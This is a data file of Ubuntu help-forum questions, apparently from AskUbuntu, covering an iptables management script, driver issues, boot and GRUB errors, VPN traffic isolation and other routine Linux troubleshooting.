335904	how to execute bash script automatically at specific interval ?	i want my code to execute automatically . how to do this ? can anyone help me , please ? how can i build scheduler in bash here is my code : checkstatus ( ) { opt_checkstatus=1 while [ $ opt_checkstatus ! = 7 ] do clear # echo -e `` \nchoose the option bellow ! ! ! \n echo -e `` \n\t*****note : save your iptables before stop/restart the iptables services*****\n '' echo -e `` 1 . save the iptables\n 2 . status of iptables\n 3 . start iptables services\n 4 . stop iptables services\n 5 . restart iptable services\n 6 . flush iptables ( **use carefully_it will remove all the rules from iptables** ) \n 7 . go back to main menu '' read opt_checkstatus case $ opt_checkstatus in 1 ) echo -e `` *******************************************************\n '' /etc/init.d/iptables save echo -e `` \n*******************************************************\n '' echo -e `` press enter key to continue ... '' read temp ; ; 2 ) echo -e `` *******************************************************\n '' /etc/init.d/iptables status echo -e `` ******************************************************* '' echo -e `` press enter key to continue ... '' read temp ; ; 3 ) echo -e `` *******************************************************\n '' /etc/init.d/iptables start echo -e `` *******************************************************\n '' echo -e `` press enter key to continue ... '' read temp ; ; 4 ) echo -e `` *******************************************************\n '' /etc/init.d/iptables stop echo -e `` *******************************************************\n '' echo -e `` press enter key to continue ... '' read temp ; ; 5 ) echo -e `` *******************************************************\n '' /etc/init.d/iptables restart echo -e `` *******************************************************\n '' echo -e `` press enter key to continue ... '' read temp ; ; 6 ) iptables -f echo -e `` ******************************************************* '' echo -e `` all the rules from the iptables are flushed ! ! ! '' echo -e `` *******************************************************\n '' echo -e `` press enter key to continue ... '' read temp ; ; 7 ) main ; ; * ) echo -e `` wrong option selected ! ! ! '' esac done } # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # build firewall program begins from here # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # buildfirewall ( ) { # # # # # # # # # # # # # # # getting the chain # # # # # # # # # # # # echo -e `` using which chain of filter table ? \n 1 . input 2 . output 3 . forward '' read opt_ch case $ opt_ch in 1 ) chain= '' input '' ; ; 2 ) chain= '' output '' ; ; 3 ) chain= '' forward '' ; ; * ) echo -e `` wrong option selected ! ! ! '' esac # # # # # # # # # getting source ip address # # # # # # # # # # # label echo -e `` 1 . firewall using single source ip\n 2 . firewall using source subnet\n 3 . firewall using for all source networks\n '' read opt_ip case $ opt_ip in 1 ) echo -e `` \nplease enter the ip address of the source '' read ip_source ; ; 2 ) echo -e `` \nplease enter the source subnet ( e.g 192.168.10.0/24 ) '' read ip_source ; ; 3 ) ip_source= '' 0/0 '' ; ; # 4 ) ip_source = `` null '' ; ; * ) echo -e `` wrong option selected '' esac # # # # # # # # # getting destination ip address # # # # # # # # # # echo -e `` 1 . firewall using single destination ip\n 2 . firewall using destination subnet\n 3 . firewall using for all destination networks\n '' read opt_ip case $ opt_ip in 1 ) echo -e `` \nplease enter the ip address of the destination '' read ip_dest ; ; 2 ) echo -e `` \nplease enter the destination subnet ( e.g 192.168.10.0/24 ) '' read ip_dest ; ; 3 ) ip_dest= '' 0/0 '' ; ; # 4 ) ip_dest = `` null '' ; ; * ) echo -e `` wrong option selected '' esac # # # # # # # # # # # # # # # getting the protocol # # # # # # # # # # # # # echo -e `` 1 . block all traffic of tcp 2 . block specific tcp service 3 . block specific port 4 . using no protocol '' read proto_ch case $ proto_ch in 1 ) proto=tcp ; ; 2 ) echo -e `` enter the tcp service name : ( capital letters ! ! ! ) '' read proto ; ; 3 ) echo -e `` enter the port name : ( capital letters ! ! ! ) '' read proto ; ; 4 ) proto= '' null '' ; ; * ) echo -e `` wrong option selected ! ! ! '' esac # # # # # # # # # # # # # what to do with rule # # # # # # # # # # # # # echo -e `` what to do with rule ? 1 . accept the packet 2 . reject the packet 3 . drop the packet 4 . create log '' read rule_ch case $ rule_ch in 1 ) rule= '' accept '' ; ; 2 ) rule= '' reject '' ; ; 3 ) rule= '' drop '' ; ; 4 ) rule= '' log '' ; ; esac # # # # # # # # # # # # # # # # # # # generating the rule # # # # # # # # # # # # # # # # # # # # echo -e `` \n\tpress enter key to generate the complete rule ! ! ! '' read temp echo -e `` the generated rule is \n '' if [ $ proto == `` null '' ] ; then echo -e `` \niptables -a $ chain -s $ ip_source -d $ ip_dest -j $ rule\n '' gen=1 else echo -e `` \niptables -a $ chain -s $ ip_source -d $ ip_dest -p $ proto -j $ rule\n '' gen=2 fi echo -e `` \n\tdo you want to enter the above rule to the iptables ? yes=1 , no=2 '' read yesno if [ $ yesno == 1 ] & & [ $ gen == 1 ] ; then iptables -a $ chain -s $ ip_source -d $ ip_dest -j $ rule else if [ $ yesno == 1 ] & & [ $ gen == 2 ] ; then iptables -a $ chain -s $ ip_source -d $ ip_dest -p $ proto -j $ rule else if [ $ yesno == 2 ] ; then main fi fi fi } main ( ) { root_uid=0 if [ $ uid == $ root_uid ] ; then clear opt_main=1 while [ $ opt_main ! = 4 ] do echo -e `` /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n '' # # # # # # # # # # # # # check whether the iptables installed or not # # # # # # # # # # # # echo -e `` \t*****main menu*****\n 1 . check iptables package\n 2 . iptables services\n 3 . build your firewall with iptables\n 4 . exit '' read opt_main case $ opt_main in 1 ) echo -e `` ****************************** '' rpm -q iptables echo -e `` ****************************** '' ; ; 2 ) checkstatus ; ; 3 ) buildfirewall ; ; 4 ) exit 0 ; ; * ) echo -e `` wrong option selected ! ! ! '' esac done else echo -e `` you must be the root to perfom this task ! ! ! '' fi } main exit 0
335908	mouse scroll wheel does not work for ubuntu 12.04 running under hyper-v for windows 8 pro	i 'm using ubuntu 12.04 lts on a hyper-v virtual machine ( ms windows 8 pro ) and i need some help with the mouse driver . the mouse responds fine in general : the cursor 's moving , left/right click works ok and also when i press the wheel windows are changing and tabs are closing . everything except using the scroll wheel . then nothing happens . can someone guide me how to solve this ? thanks !
335909	error mounting /dev/sda2 at /media	when i try to access my hard disk on windows i got the following error : error mounting /dev/sda2 at /media/debo/2290657790655279 : command-line `mount -t '' ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' '' /dev/sda2 '' `` /media/debo/2290657790655279 '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . please can anyone help me on this ?
335915	port ubuntu touch to unsupported tablet	i consider buying a chinese tablet with an exynos 5250 soc . it is a voyo a15 . it is not supported by cyanogenmod , but there is a custom rom available for this tablet . i would want to install ubuntu touch on it . my question : would it be possible to port ubuntu touch to this device ? considering it has the same soc as the nexus 10 . i have enough linux experience ( of building kernels etc . ) , so i could do ( at least try to do ) the porting myself . the manufacturer has not yet released the source for their rom , but the drivers for the exynos chip are available . the exynos is not the only chip on the tablet , so if the manufacturer does n't release those drivers , is it still possible ? maybe this is not the right place to ask this question , should i try at cyanogenmod forums ? maybe there is someone with experience of porting cyanogenmod/ubuntutouch to exotic android tablets ?
335917	convert a presentation to video with narration	i have an openoffice presentation . i want to create a movie ( for youtube ) , that shows the slides , with my voice explaining about them . is this possible in ubuntu ?
335919	connecting drobo pro over iscsi to ubuntu with two nics	i 'm trying to get a drobo pro working with ubuntu over iscsi . the machine in question has got two nics -- the original one ( used to connect to the internet ) , and one i just installed via a spare pci-e slot . i 'm having trouble figuring out how to get the second nic to serve as a gateway for the drobo , but i have no idea what changes i might need to make ( to /etc/network/interfaces or otherwise ) to have my ubuntu machine assign an ip to the drobo . any help would be greatly appreciated . thanks !
335927	my mini project	i am doing my mini project in ubuntu . its actually a text editor like gedit . i am done with basic elements like cut copy paste delete and save..can i get the source code for bookmarking and syntax highlighting . i am doing it in java with net beans ide .
335935	how can i start ubuntu one when os x starts ?	ubuntu one is not started automatically when my mac os x starts . can i add it manually to the operating system start up ?
335941	screen is black after unplugging battery charger on an asus k52j	when i unplug my battery charger my screen turns black . i already checked the brightness/battery settings , but nothings is wrong with those settings . someone have any idea how to solve this problem ?
335946	nexus 7 3g [ 2012 ] problem with ubuntu touch	i am having problems after installing ubuntu touch on my nexus 7 3g i tried using the command to install ubuntu touch sudo pablet-flash cdimage-touch -d grouper -b but after installing , it doesnât boot . it 's stuck at the google splash screen . . i can go to the recovery menu . i tried to flash packages manually with no joy . i can login to ubuntu via terminal connected using the usb cable $ adb shell busybox v1.20.2 ( ubuntu 1:1.20.0-8.1ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . but it doesnât show anything on the screen in the recovery mode , i can connect via shell commands again but commands are very limited ~ # pwd / ~ # uname -a linux localhost 3.1.10-6-grouper # 23-ubuntu smp preempt fri aug 16 18:58:39 utc 2013 armv7l gnu/linux any help would be greatly appreciated .
335947	how can i install windows 8 as a dual boot over an existing ubuntu installation	i found many tutorials on how to do the opposite : add ubuntu onto an existing windows install . i ca n't find any that will let me install windows 8 as a dual boot over ubuntu 12.04 . thanks !
335950	qt creator - testing code	i am doing the tutorial 'currencyconverter ' . but i am not able to see the output . the code compiles fine . but the mainview after opening just shows blank window . what might be the issue ?
335957	why does rhythmbox lose link to music folder located in ntfs partition ?	rhythmbox loses link to music folder located in ntfs partition even though all the ntfs partitions are mounted when ubuntu 13.04 starts up . why does this happen and how do i solve it ?
335958	uninstall ubuntu in a strange manner	i have failed by the installation of kali linux and remove windows . instead i installed ubuntu 13.04 . i have a boot-able usb with windows 7 , but i cant boot from it . my question is , can i uninstall ubuntu without re-formatting the hard-drive manually ?
335959	can i open email by clicking on notification ?	on ubuntu 12.04 , using thunderbird , everything up to date . whenever mail arrives , i get notification in right hand top part of the screen . the notification is somewhat similar to what outlook shows in right bottom panel . if i mouse over it , it stays there , greyed out and not readable , but it 's not clickable . what purpose does this solve ? the reason i am moving mouse over it so that i can read it and hope to keep it little longer to give me a chance , but it 's not readable . i can not click on it as it not clickable . if mouse moves out , it becomes readable again . can i configure something ( do n't know what ) so that i can click on the notification , it can open thunderbird and take me to the mail or at least make it more readable .
335961	create default home directory for existing user in terminal	how do i do this ? i created a user without a home directory and now i want to create one . not just a folder called new_user , i want the default home directory with all it 's folders and hidden files , etc .
335964	empty trash sound event ?	is there any way to add a sound event every time i empty trash on my ubuntu 12.04.2 lts i386 unity version . ?
335968	osd lyrics on ubuntu 13.04	guys how do i install osd lyrics on ubuntu 13.04 ? i added the repo , but when installing it comes : fetched 1,132 kb in 47s ( 23.8 kb/s ) w : failed to fetch http : //ppa.launchpad.net/osd-lyrics/ppa/ubuntu/dists/raring/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/osd-lyrics/ppa/ubuntu/dists/raring/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i have clementine installed , but osd is n't . even when i search in the dash it does n't show up please help
335972	how could i create a docklet or icon in the unity	i have think about what dock i should install for ubuntu . then i think ok why should i install one there is already one on the left side . but now my question , how can i intigrate my own docklet 's or create a link to a bash skript ? short question , but a long story , i think . may anyone help me ?
335974	start thinking sphinx on ubuntu startup	i need run this rails command automatically , from my project folder , every time my server starts up : rake ts : start i put a file called run_ts.sh in my rails project folder : # ! /bin/bash rake ts : start in /etc/rc.local i added : /usr/local/ispmgr/sbin/eximquota /usr/local/ispmgr/sbin/ihttpd iphidden /etc/init.d/apache2 start /home/prog/onlineauto/shop/run_ts.sh exit 0 but my command is not executing , so rake ts : start is not executed . how can i start thinking sphinx on each system startup ?
335977	unity is working but not visible after installing amd catalyst 13.8 beta2	i have installed amd catalyst 13.8 beta 2 drivers now the unity is working i can click the close button or maximize button or everything if i remember their locations they are nto visible : ( some one please help me check this screenshot , the top and left corners are occupied by unity http : //pbrd.co/16aa1cf i am aware that i can resolve this issue by removing amd drivers , i want to use the amd drivers , please help me resolve this issue ( i installed using this procedure for ubuntu 13.04 how do i get amd/intel hybrid graphics drivers to work ? ) my card is amd radeon hd 6370m ( 6300m series as stated in about dialog )
335978	12.04 boots to command line after running ubuntu tweek janitor	i 've looked through various answers to this , but none has solved my problem . here are the specifics : i ran ubuntu tweak janitor to clean up some old kernels ( i still left some ) as well as caches and old configuration files ( all under the system portion of the janitor section ) . i also clean-out some program cache stuff ( also under janitor ) . upon reboot , i got a surprise : i only boot to the command line and can login via command line at the login prompt i get iptables-restore : line 59 failed problem running '/lib/ufw/user.rules' i also get messages every few seconds with a number sequence one states : `` asking for cache data failed '' and the other states `` assuming drive cache : write through '' once hitting enter , i can log-in but remain at the command prompt . at the prompt , i 've tried : ctrl-alt-f7 ( seems to do something then just stops - usually at `` checking battery state '' ) sudo apt-get install ubuntu-desktop xorg build-essential : i get a message that nothing installed as the most current version is already installed . startx ( results in x : can not stat /etc/x11/x ( no such file or directory ) , aborting . tried starting with other kernels ( same result ) tried part of suggestion here : `` /etc/x11/x not executable '' error when startx - when running the sudo apt-get update & & apt-get upgrade i got the following : e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permissioin denied ) e : unable to lock the adminsitration directory ( /var/lib/dpkg/ ) , are you root ? i then tried the sudo apt-get installs -- reinstall xserver-xorg - made no difference . i did n't try the last command as i 'm not sure it applies to my system and did n't want to make things worse ( let me know if is something i should do ) . please help me fix whatever messed up so i can get my gui back . i 'm betting it 's a simple fix but i ca n't figure it out !
335987	remove sudo privileges from a user ( without deleting the user )	if you give a user sudo privileges how can i remove the sudo privileges and make the user become just a regular user ? i used : sudo adduser username sudo now i 've changed my mind .
335990	how to specify a daemon shutdown command with upstart ?	in an upstart configuration how do i define what command should be used to shutdown a server . lets say i have daemon that has two seperate processes . startup.sh - to start the server shutdown.sh - to shut down the server suppose i have an upstart file that looks like this . description `` some example service '' author `` me '' start on runlevel [ 2345 ] stop on runlevel [ 016 ] respawn exec startup.sh how do i tell upstart that it should call shutdown.sh when shutting down the server ? how does upstart normally expect to shut down a daemon ?
335992	not updating display settings when disconnecting external monitor	when i disconnect my monitor from my laptop , ubuntu still seems to think that it is plugged in and does't update the display . this issue is ubuntu specific ( not occuring in windows ) and my monitor worked fine with another laptop ( ubuntu 13.04 , exact same drivers ) . the quickfix : open system settings click displays useful specs : graphics drivers : nvidia-313 ( problem also occurs with the other propriatary drivers ) graphics card : nvidia quadro k1000m monitor : benq et-0019-n cable : vga d-sub de15 os : ubuntu 13.04 i would like ubuntu to update the display settings automagically whenever the monitor cable gets disconnected . how would i do that ?
335995	problems with `` how to create a bootable usb stick on windows ''	i 'm looking at http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows it 's a really long time since i 've used linux , but to me this is unclear , i 've downloaded the app from pen drive linux , but then when i use it , in step two it says `` click 'browse ' and open the downloaded iso file . '' but at no point has it told me to download an iso file , or given a link to where i download it from . the one given in the picture is called precise-desktop.iso , i 've no idea if that 's the file i 'm supposed to be downloading , or if i need to rename the file to this , or if i just need to download a regular ubuntu distribution , which is what i 'm doing now .
336000	mac crashed - installing ubuntu as single boot	my new mac book pro crashed . yes , i have the warranty & apple guys will replace the hdd but i do not want this crappy apple now . i 'd rather consider setting up ubuntu on this hardware . i 've taken out mac book 's original hdd ( that crashed ) and got a new external disk . i intend to use this new hdd with ubuntu installed on my mac . there is no working copy of mac os in the original mac disk now . i 've seen several posts suggesting i can install ubuntu on the disk and i have already done the install on my new external disk . the problem i am facing at the moment is once i take out the ubuntu install cd and try to boot the mac with the new hdd ( ubuntu ) , it does n't start up . this new hdd is connected as external disk only ( via a usb connector ) . should i put it inside the mac instead. ? are there any issues using ubuntu as single boot on mac ? what about mac firmware updates ? any points / inputs will be helpful .
336006	libreoffice 4.1 not integrated into launcher properly	running 12.04 64bit ubuntu , and after installing libreoffice 4.1 from the official ppa , i get this integration problem upon opening already existing text documents , them being .doc , .docx or .odt . anyone have a solution ?
336007	ubuntu on hp 510 laptop	i just came across this old laptop and i wanted to try something new , so i decided to install ubuntu 12.04 on it . i am a rookie at ubuntu . so i noticed that the os ai n't that great in terms of smoothness , since it 's laggy . do n't think that the os is the problem , just the laptops hardware . 1.4 ghz intel processor 512 mb of ram 128 mb video card . i was hoping that someone could tell me if my laptop is fit to use 12.04 or is it to old ? maybe i have to install some drivers or whatnot . i want to use this laptop for college . no need for gaming . just for projects , maybe watch a movie or a youtube video , which by the way lags like hell when in full screen ( unwatchable ) . i was thinking of updating my ram to 1 gb , hope that will help ubuntu run more smoother . what do you thing ? thanks in advance ! ! ! : )
336017	where can i find the command line editor	i am trying to find the command line package as i am wanting to install replicator g onto my system as i am involved with a 3d printing package . but for the life of me i can not find it i 'm a newby at linux so need a lot of help . i have tried to locate in all menus and packages and then even tried to download one . nigel
336020	how do i fix this problem with grub after installing ubuntu server ?	i 've installed grub as part of the installation process of ubuntu server 13.04 lts edition . this is the screen that i get after booting from my hard drive : grub : loading . welcome to grub ! error : file '/boot/grub/i386-pc/normal.mod ' not found . grub rescue > i tried installing ubuntu server ( after numerous installs ) on my partitioned hard drive . i remember them as sda5 and sda6 . the install was to dual boot with windows 7 . when i first install grub , i used the i386 iso , but after i found out that i could use the amd version to optimize , i installed that . now , grub has an error and i do n't know what to do . almost all the help tell me to use a cd-rom , but i used a flash drive . now , i just want to either repair grub , or get rid of ubuntu and grub entirely , as long as i can save my windows7 partitioned on my sda1-3 . i 'm very new , so step by step instructions help .
336023	how do i get unity back after installing nvidia drivers	i know this might look like a repeated question but i 've been looking for a solution everywhere i could think of with no success i am using a dell inspiron n5110 it has intel shared graphics and an nvidia geforce gt 525m graphics card running ubuntu 13.04 64-bit which is very bad for some reason anyways , i installed drivers for the nvidia card from the xorg edgers huge mistake because now , unity wo n't appear i can only see my desktop and the files on it which sucks because i ca n't really run any programs the only reason i 'm able to use chrome to write this is because i have an html page on the desktop i open it , then it opens in chrome other than that , the launcher and top bar are gone i can only close chrome by closing all tabs and have to shutdown from terminal i installed bumblebee , nvidia drivers removed them reinstalled them again nothing changed i am still unable to use unity i know someone somewhere has a solution other than reinstalling ubuntu can you please help me internet ? update : i have used the following commands dconf reset -f /org/compiz/ unity -- reset-icons & disown to get unity to reappear the launcher does n't have my old icons , it has the default ones and when i run it through the terminal , it produces a giant list of errors i do n't want to have to run this every time i start ubuntu ! !
336024	help ! install ubuntu on late 2006 macbook without cd	i have been trying for 14+ hours to install ubuntu linux on my late 2006 macbook . my macbook has functional usb drives , but the optical drive is bad . i have tried all kinds of `` how-to '' guides online that include sudo dd , partitioning drives , efi , etc . but when i try to boot with efi ( refind ) with the usb , or on the new drive i partitioned and sudo dd 'd , it fails . the screen comes up at boot with the penguin and mac symbols , and other efi things . but when i click on the penguin to run ubuntu it states this : starting legacy loader usb load options 'usb' error : not found returned from legacy loader error : not found from locatedevicepath error : load error while ( re ) opening our installation volume . the firmware refused to boot from the selected volume . note that external hard drives are not well-supported by apple 's firmware for legacy os booting . hit any key to continue and then i have to shutdown and restart with the start button because the keyboard refuses to work . i am kinda at my wit 's end with this . i really want ubuntu . is there any possible way to install ubuntu for my macbook without buying an external optical drive ? i have seen the `` networking '' and `` bittorrent '' installation guides on the ubuntu website , but i have no idea where to even start there . i do n't really have any concept of what either of those are .
336026	asus n56dp sonic master subwoofer not working	i have asus n56dp with amd processor and graphics not intel . i ca n't get the subwoofer working . lspci | grep audio output : 00:01.1 audio device : advanced micro devices [ amd ] nee ati device 9902 00:14.2 audio device : advanced micro devices [ amd ] hudson azalia controller ( rev 01 )
336032	hp envy 6 amd overheating	i installed ubuntu and all is fine and working ( i think ) however , my laptop seems to be overheating faster and hotter than it does when its running windows . how do i find out if all the hardware is installed correctly ? and what 's causing the heating issue ? i 'm not doing anything on the laptop to cause it to heat up just been installing steam , spotify and setting up thunderbird .
336037	after trying to install ubuntu no os is working	i am very new to ubuntu , i tried to install it from a usb stick but it got stuck on the swap partition so i tried quit and now i can not even boot on windows 8 . i tried also the boot repair and i get this report . any suggestions , i can not even enter into bios mode thank you in advance zampeta
336045	how to resize images for wallpaper ?	i am using ubuntu 12.04 . i am trying to set a rotating picture of earth as my wallpaper . i 'm currently using `` scheduled tasks '' with this command : wget -o static.die.net/earth/mercator/1600.jpg \ -- user-agent= '' mozilla/5.0 ( x11 ; u ; linux x86_64 ; en-us ) applewebkit/534.10 ( khtml , like gecko ) chrome/8.0.552.224 safari/534.10 '' \ http : //static.die.net/earth/mercator/1600.jpg how can i resize the image in the same command to 1280x1024 ? also : > /dev/null 2 > & 1 gets added every time the command is run . is there a way i can fix this ?
336046	spotify not playing local files	spotify when ran using wine will not play local files ( mp3 's , wma 's ) . when i open the containing folder the files are present but when selected from the wine explorer it gives the error message : `` there is no windows program configured to open this type of file ''
336048	external hard drives not detected 12.04 lts	i have two western digital hard drives that i have been using successfully for months now . a 250gb and a 2tb drive . now today without any previous issues neither will open from desktop or terminal . here is what i found with sudo fdisk -l : disk /dev/sda : 80.0 gb , 80026361856 bytes 255 heads , 63 sectors/track , 9729 cylinders , total 156301488 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000ceec4 device boot start end blocks id system /dev/sda1 * 2048 155387903 77692928 83 linux /dev/sda2 155389950 156301311 455681 5 extended /dev/sda5 155389952 156301311 455680 82 linux swap / solaris disk /dev/sdb : 2000.4 gb , 2000365289472 bytes 255 heads , 63 sectors/track , 243197 cylinders , total 3906963456 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0005f107 device boot start end blocks id system /dev/sdb1 2048 3906963455 1953480704 7 hpfs/ntfs/exfat disk /dev/sdc : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x5b6ac646 device boot start end blocks id system /dev/sdc1 63 488392064 244196001 c w95 fat32 ( lba ) any help or advice you might have in resolving this would be appreciated . thank you .
336050	can my computer handle ubuntu 12.04 ?	i was wondering ... can i run ubuntu with these specs ? windows xp sp2 ( x86 ) compaq presario amd anthlon 64 processor 3400+ 1.81 ghz 896 mb of ram could i run ubuntu alongside this computer without messing up the windows operating system/bios ?
336052	how to make etckeeper use the right value for git author & email with apt-get	i 'm using git with etckeeper . when i use sudo git to commit changes in /etc/ , git_author_name & git_author_email from my env are used ( as intended ) . when i use sudo apt-get and changes are auto-commited , the local username @ host is used instead . why the change in behavior and how can i make sudo apt-get use the env vars ?
336059	how to start a new xsession for ssh forwarding ?	i want to forward an xsession over ssh to another system , but i get this error : fatal server error : server is already active for display 0 if this server is no longer running , remove /tmp/.x0-lock and start again . i do n't want to kill the currently running xsession . how can i start a new xsession for ssh forwarding ? running ubuntu 12.04 on both client and server .
336065	dual win8 + ubuntu ... now i ca n't put windows to sleep	i recently installed ubuntu 13.04 alongside windows 8 . ever since then , i 'm not able to put my computer to sleep in windows 8 . i click sleep , and it goes black , then just turns back on . after some digging , i found this thread ( http : //ubuntuforums.org/showthread.php ? t=1341694 ) from a few years ago . i followed the instructions the guy suggested , but it did n't work . was i supposed to remove the boot flag from the ubuntu partition as well ? any ideas ? i 've tried using easybcd to make windows 8 my default , but it did n't work . as far as i understand , the reason windows refuses to sleep is that it 's not the primary boot drive or something .
336068	problem with default shell and home directory	i have recently been granted access to a machine at work . however , i have been having trouble setting up my development environment . relevant information about the machine : $ uname -a linux blackhawk2 3.2.0-41-generic # 66-ubuntu smp thu apr 25 03:27:11 utc 2013 x86_64 x86_64 x86_64 gnu/linux i use openssh to login into to this machine remotely . the thing i noticed immediately , was that my home directory was not set properly . $ echo $ home / further my shell of preference is bash , but : $ echo $ shell /bin/csh i am aware that the home directory and the default shell is setup in '/etc/passwd ' . inspecting this file i find : glperez : x:1015:1015 : glperez , , , :/home/glperez : /bin/bash edit : my home directory definitely exists and '/bin/bash ' is working properly . also , user authentication is handled over an authentication server of some kind . unfortunately , this information is not readily available to me at this moment . the strange thing is that on both occasions that i have tried to fix this problem , the first log in results in the expected behavior . that is , my home directory is correctly set and my shell is bash . upon logging in again , the problem shows up .
336069	how do i use oauth from an ubuntu touch app ?	i 'm writing an ubuntu touch application in qml . i 'd like to integrate with trello . there are two ways to log into trello in the api , one of which is oauth , which i plan on using . what is the best way to do this from qml ? i 'd prefer not to use a c++ backend , but i am willing to do so if that is the only way .
336074	couldnt install wireless driver for ubuntu 12.04 in asus laptop	i could not install the wireless driver in ubuntu 12.04 in asus x45c laptop . i already try all the methods in ubuntu forums . please someone help me..
336078	missing bootmgr after removing the windows parttion	i have a dell inspiron laptop that i no longer use much . i had installed ubuntu 12.04 on a partition . i loved it and decided to remove the windows partition altogether . however , after doing so , i now can not boot into ubuntu , and get a missing bootmgr error message . i have been trying to read through similar posts , but i just ca n't get it . if anyone could walk me through a fix , i would greatly appreciate it .
336083	how to use arguments in qml without getting qmlscene arguments	i 'm trying to write a qml application to be launched by qmlscene . i want this to accept arguments , so i 'm using the arguments object . however , this gets the arguments passed to qmlscene as well as those i mean to pass to my program . more problematically , if one of the arguments is a file , qmlscene tries to process it , failing or hanging . is there a good way around this problem ? the first thing i tried was to pass the arguments in as a specific named argument that qmlscene would ignore . the launch line looks like qmlscene -i < directory > < qml file > -- appargs= '' $ * '' . ( $ * is a bashism for all the arguments as a single string . ) for a single argument , this works pretty well . but if i were to want to pass more than one argument in , i 'd have to parse them myself , which sort of defeats the purpose of having an argument parser . looking at some sample .desktop files , i noticed they put the arguments before the qml file , so i tried a command line like qmlscene `` $ @ '' -i < directory > < qml file > . this does keep qmlscene from trying to interpret these arguments . but if i do n't pass any arguments , the arguments object will happily process the arguments meant for qmlscene . so i still have to do some processing here . i ca n't help but suspect i missing a better way . what is it ?
336089	how can i isolate l2tp vpn client traffic from my home network ?	i have successfully set up an l2tp/ipsec server under server 12.04 lts , following info from here with a few tweaks from here . i can connect on my iphone , get an internal address , and browse the internet as if i 'm sitting at my desk at home . one thing i 'd like to do is isolate vpn traffic so that vpn clients ca n't access anything else in my home network . ( yeah , it sounds strange , but this is strictly for ios devices only , and really only for when i 'm traveling and need my home ip address while on the internet . i have other ways to get to my home computer or file shares . ) the setup is , my home network dhcp range is 192.168.1.0/24 ; the vpn range is 192.168.2.0/24 . so in /etc/ipsec.conf i have the following , which , based on the comments in the file , i thought should limit accessible subnets to just what 's on this line : virtual_private= % v4:192.168.2.0/24 additionally , in the [ lns default ] section of /etc/xl2tpd/xl2tpd.conf i have the following : ip range = 192.168.2.1-192.168.2.254 however when i connect with my phone , i can browse my plex media manager , which is located in my dhcp range . it 's that kind of access i 'm looking to restrict . in talking with some friends the first off-the-cuff idea was to use vlans . but the server is running as a virtual ( vbox ) on my desktop pc with one nic so i do n't think i can use vlans here . the next-best suggestion was to put up some iptables rules to drop traffic not going to 192.168.2.0/24 but i ca n't seem to get the rule ( s ) right - i 've been using -a output ! -d 192.168.2.0/24 -j drop but it seems like there needs to be an exception to that rule and i confess my fluency in iptables is kinda terrible . as soon as i enter that rule by itself , i can no longer make a vpn connection . i also experimented with using two nics , one with a static ip of 192.168.2.1 and another with a static ip of 192.168.1.xxx , then change over the conf files to use the .2.1 address ; but even after changing the confs and adjusting the port forwarding , i was n't able to connect . on my router , i did verify that the router itself had access to 192.168.2.1 and that the router 's subnet mask was 255.255.0.0 . i could ping both nics from my laptop as well . i 'm kinda bumping into all the walls here . can anyone give me some pointers on how to isolate vpn traffic from the rest of my network ( basically internet only , no intranet ) , given a virtual installation running in vbox with bridged networking ?
336090	how install graphicsmagick with quantum 16	how can i configure graphicsmagick to use -- with-quantum-depth=16 before installing it with apt-get ? is it possible to do or should i build it from source ?
336094	mail from website to external error although lampp dovecot and saslauthd already started at boot . when i restart lampp mail is sent	my boot order is saslauth started dovecot started postfix started lampp started . there is no problem with internal and external sending and receiving mail only php mail code from website shows mail error . but when i restart lampp , then webmail works sending mail to google.i restart lampp from terminal . cd /opt cd lampp ./lampp restart starting apache with ssl ( and php ) ... starting mysql starting proftpd but these were already started at boot can you give me a solution ? in webmin panel saslauthd , dovecot , xinetd , postfix and enabled at boot . since friends apache lampp is installed in opt directory it is also set to start to auto boot with following commands apache friends lampp is installed in opt directory and is enabled auto start at boot with following commands ln -s /opt/lampp/lampp s99lampp ln -s /opt/lampp/lampp k01lampp however , in webmin panel boot httpd service is showing no for auto start . starting this enables another apache daemon . where is opt directory lampp installation showing auto start in boot pane ? also where is mysql and proftpd service in webmin control panel ? steff thanks for understanding the peculiar problem : i deleted httpd at boot from webmin but could not run apt-get in centos or yum uninstall apache2 . no error in log . output at terminal pas auxwe command before opt lampp restart and after opt lampp restart : mail from website works after opt lampp restart but shows error before restart . but before lampp restart mail is sent and received from gmail and server . here 's the output of ps : http : //askubuntu.com/review/suggested-edits/161097
336095	ca n't login after power outage	i have a desktop with no battery power with a very simple surge protector . i am running ubuntu 64-bit 12.04 . apt-get needed a restart of my computer to finish installing the latest updates i had downloaded . before i was able to do that , the power went out . now when i boot up , all i see is a black screen after i select ubuntu in the grub menu . i am able to get to the recovery options from the grub screen . i tried loading the failsafex version but that also failed . i have never posted anything to a forum before but i have to get this working asap because of a work project due for a client . i 'll be up all night until i can get this fixed . thanks for any and all help .
336106	how can we execute a terminal-command for all the subfolders , at once	i need to change ownership of my downloads folder from root to my username . using 'chown ' and '* ' wildcard i could get around with each folder and it 's files but that 's tedious . anything i could do here to ease my job ?
336108	how to make duplicate of whole hdd ?	i have an ubuntu 12.04 production server with a 500 gb ( nearly 15 gb used ) hdd . i want to duplicate whole hdd including , its partition structure , to another hdd with 400 gb size so that changing the hdd will not affect the working system . which tool is the best solution for this task ?
